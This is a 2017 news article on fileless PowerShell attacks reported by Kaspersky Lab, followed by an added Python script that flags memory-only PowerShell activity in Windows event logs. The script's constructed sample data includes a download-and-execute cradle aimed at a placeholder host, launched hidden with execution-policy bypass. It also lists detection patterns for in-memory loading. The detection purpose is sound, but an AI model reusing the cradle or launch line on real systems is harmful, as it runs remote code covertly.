
Proper planning key to pre-empting invisible cyber attacks

By Kgaogelo Letsebe, Portals journalist
Johannesburg, 13 Feb 2017
More than 140 enterprise networks in a range of business sectors in 40 countries have experienced "invisible" cyber attacks.

Visibility across your environment, proper security design of networks and actionable threat intelligence are the keys to protecting your enterprise against "invisible" cyber attacks.

This is according to John Mc Loughlin, managing director of J2 Software, in reaction to a Kaspersky Lab report on cyber criminals breaching more than 140 enterprise networks in a range of business sectors in 40 countries, including Kenya and Uganda.

According to the report, Kaspersky Lab experts discovered a series of "invisible" targeted attacks that use only legitimate software: widely available penetration-testing and administration tools, together with the PowerShell framework for task automation in Windows. No malware files are dropped onto the hard drive; the code hides in memory. This combined approach, the company reports, helps to avoid detection by whitelisting technologies and leaves forensic investigators with almost no artefacts or malware samples to work with. The attackers stay only long enough to gather information before their traces are wiped from the system on the first reboot.

"The use of open source exploit code, common Windows utilities and unknown domains makes it almost impossible to determine the group responsible - or even whether it is a single group or several groups sharing the same tools. Known groups that have the most similar approaches are GCMAN and Carbanak," says Kaspersky Lab.

ESET Research fellow Peter Kosinar says it is a mammoth task to track the attacks. "It is precisely the nature of being 'invisible' which makes the actual infections more difficult to track... at least until they execute their intended malicious payload."

Mc Loughlin agrees, adding that it is possible this is far more prevalent than anybody knows simply due to the nature of the attacks. "I see the main targets being named as banks, telecoms companies and government organisations. I am of the opinion that every single organisation or entity that makes use of electronic payment methods, collects credit card information or stores sensitive data on their networks and devices is a target."

Kaspersky Lab points out that recent victims included two banks, one telecom company, a financial institution, and three government entities in Kenya. In Uganda, attacks on only four financial institutions were reported.

Both Kosinar and Mc Loughlin say many of the tricks and best practices are already known as preventative measures, but companies are failing to apply them thoroughly.

Mc Loughlin explains: "The problem with this and other cyber attacks is that the attackers are putting in more effort and have resources while the individual targets (companies) do not. It is important to have endpoint visibility and behavioural monitoring and alerting or remediating any breaches as they occur. With behavioural monitoring and visibility it makes no difference if the attack is on a hard drive, network or sitting in memory - changes are flagged, the source and destination of attacks are clearly marked and you have the ability to stop these in their tracks."
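The memory-resident PowerShell tradecraft the report describes and the endpoint visibility Mc Loughlin calls for meet in the host's own event logs: a launch of powershell.exe with an encoded, hidden, policy-bypassing command line, or a script block that pulls code straight into memory, is visible there even though nothing touches the disk. The Python script below is an added example and is not code from the article, Kaspersky Lab or J2 Software. It assumes Windows command-line auditing (Security event 4688) and PowerShell script block logging (event 4104) have been enabled and that the records arrive as JSON lines in the shape shown; the hostnames, sample records, field layout and helper names are constructed for the example.

```python
"""Triage Windows event records for memory-only PowerShell activity.

Added example, not code from the article, Kaspersky Lab or J2 Software.
Every record below is constructed, and the helper names are this example's own.
"""
import base64
import json
import re
from typing import Optional

# Spellings PowerShell accepts for -EncodedCommand (any unambiguous prefix).
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
# Launch switches that are unusual for hands-on administration but routine in
# fileless tooling: no profile, hidden window, execution-policy bypass.
QUIET_FLAGS = {"-nop", "-noprofile", "-w", "-windowstyle", "-ep", "-exec", "-executionpolicy"}
# Script content that fetches or loads code straight into memory, leaving no
# file on disk for whitelisting or forensics to find.
MEMORY_PATTERNS = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|FromBase64String|"
    r"Net\.WebClient|Reflection\.Assembly|Runtime\.InteropServices",
    re.IGNORECASE,
)
# Parent processes that have no ordinary reason to start a shell (non-exhaustive).
ODD_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe")


def encode_command(script: str) -> str:
    """Base64 of UTF-16LE text, the form -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Inverse of encode_command; None when the blob is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(record: dict) -> Optional[dict]:
    """Return a finding for one event record, or None when nothing stands out."""
    reasons = []
    script = ""
    event_id = record.get("EventID")
    if event_id == 4688:  # process creation, with command-line auditing enabled
        image = record.get("Image", "").lower()
        if not image.endswith(("powershell.exe", "pwsh.exe")):
            return None
        tokens = record.get("CommandLine", "").split()
        lowered = [t.lower() for t in tokens]
        for i, tok in enumerate(lowered):
            if tok in ENCODED_FLAGS and i + 1 < len(tokens):
                reasons.append("encoded command line")
                script = decode_command(tokens[i + 1]) or ""  # surface the real script
        quiet = sorted(QUIET_FLAGS.intersection(lowered))
        if quiet:
            reasons.append("quiet launch switches: " + " ".join(quiet))
        parent = record.get("ParentImage", "").lower()
        if parent.endswith(ODD_PARENTS):
            reasons.append("spawned by " + parent.rsplit("\\", 1)[-1])
    elif event_id == 4104:  # script block logging: the script text as executed
        script = record.get("ScriptBlockText", "")
    else:
        return None
    match = MEMORY_PATTERNS.search(script)
    if match:
        reasons.append("in-memory execution pattern: " + match.group(0))
    if not reasons:
        return None
    return {"Host": record.get("Host"), "EventID": event_id,
            "reasons": reasons, "script": script}


def triage(log_lines: str) -> list[dict]:
    """Run analyse() over JSON-lines input and collect the findings."""
    findings = []
    for line in log_lines.splitlines():
        if line.strip():
            finding = analyse(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample log: a benign process start, an Office-spawned encoded
# PowerShell launch, a routine scripted backup, and two script blocks.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_RECORDS = [
    {"EventID": 4688, "Host": "ws01", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 4688, "Host": "ws01",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Exec Bypass -enc " + encode_command(CRADLE)},
    {"EventID": 4688, "Host": "srv02", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"EventID": 4104, "Host": "srv02",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq Running"},
    {"EventID": 4104, "Host": "ws01",
     "ScriptBlockText": "[System.Reflection.Assembly]::Load($bytes) | Out-Null"},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in SAMPLE_RECORDS)

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding["Host"], finding["EventID"], "; ".join(finding["reasons"]))
```

Two of the five constructed records are reported: the Office-spawned encoded launch (with the decoded script attached for the analyst) and the reflective assembly load, while the scripted backup and the interactive service query pass. Because an in-memory implant leaves nothing to recover once the machine reboots, a check like this is only as good as the event forwarding behind it: the 4688 and 4104 records have to leave the host as they are written, not be collected after the fact.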
